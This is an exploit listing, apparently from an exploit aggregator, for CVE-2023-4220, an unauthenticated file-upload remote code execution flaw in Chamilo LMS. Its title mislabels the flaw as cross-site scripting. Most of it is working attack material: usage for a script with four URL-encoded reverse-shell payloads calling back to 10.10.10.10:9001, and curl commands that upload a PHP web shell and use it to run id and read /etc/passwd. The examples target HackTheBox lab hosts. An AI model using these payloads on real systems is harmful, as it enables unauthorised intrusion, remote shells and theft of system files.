Exploit for Cross-site Scripting in Chamilo Chamilo Lms CVE-2023-4220

Name: Exploit for Cross-site Scripting in Chamilo Chamilo Lms CVE-2023-4220
Rating: 5 (268 reviews)
2024-07-11 | CVSS 8.1
## https://sploitus.com/exploit?id=98C56FCF-97F3-56BA-B6E6-ECD022931F60
<h1>CVE-2023-4220 Exploit</h1>

<h2>Chamilo LMS Unauthenticated Big Upload File Remote Code Execution</h2>

--------------------------------------------------------

<h2>Usage cve-2023-4220.sh</h2>

`./cve-2023-4220.sh <Target-URL> <Target-Port> <Local-HOST> <Local-IP> <Payload>`

`./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1`

```
./cve-2023-4220.sh -h                                 

Usage for RevShell: ./cve-2023-4220.sh <Target-URL> <Target-Port> <Local-HOST> <Local-IP> <Payload>

Example: ./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1

Payload: 1 == rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.10.10%209001%20%3E%2Ftmp%2Ff

Payload: 2 == sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.10.10%2F9001%200%3E%261

Payload: 3 == nc%2010.10.10.10%209001%20-e%20sh

Payload: 4 == python3%20-c%20%27import%20os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.10.10%22%2C9001%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for%20f%20in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27

Payload: 5 == Enter own Payload:
```
![Example](/permx033.png)

![Example](/permx028.png)

![Example](/permx030.png)

--------------------------------------------------------

<h2>Get RCE</h2>

```
echo '<?php system($_GET["jiji"]);  ?>' > jiji.php

curl -F 'bigUploadFile=@jiji.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/jiji.php?jiji=id'

curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/jiji.php?jiji=cat+/etc/passwd'
```

![Example](/permx034.png)

![Example](/permx035.png)

--------------------------------------------------------

<h2>Usage cve-2023-4220.py</h2>

![Example](/permx036.png)

--------------------------------------------------------

**Source: https://starlabs.sg/advisories/23/23-4220/**

`$ echo '<?php system("id"); ?>' > rce.php`<br>
`$ curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`<br>
`The file has successfully been uploaded.`<br>
`$ curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'`<br>
`uid=33(www-data) gid=33(www-data) groups=33(www-data)`